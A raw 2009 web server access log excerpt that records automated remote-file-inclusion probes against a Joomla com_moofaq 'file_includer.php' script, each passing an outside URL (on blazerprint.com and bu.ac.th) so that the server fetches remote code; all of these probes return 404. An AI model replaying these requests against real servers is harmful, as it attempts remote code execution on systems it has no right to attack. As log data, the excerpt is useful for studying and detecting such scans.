172.16.1.87 - - [05/Aug/2009:09:03:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:03:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.32.69.162 - - [05/Aug/2009:09:03:22 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
72.32.69.162 - - [05/Aug/2009:09:03:22 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
72.32.69.162 - - [05/Aug/2009:09:03:22 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
72.32.69.162 - - [05/Aug/2009:09:03:23 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
72.30.81.182 - - [05/Aug/2009:09:02:51 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [05/Aug/2009:09:03:34 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [05/Aug/2009:09:03:34 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
209.172.33.230 - - [05/Aug/2009:09:03:34 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
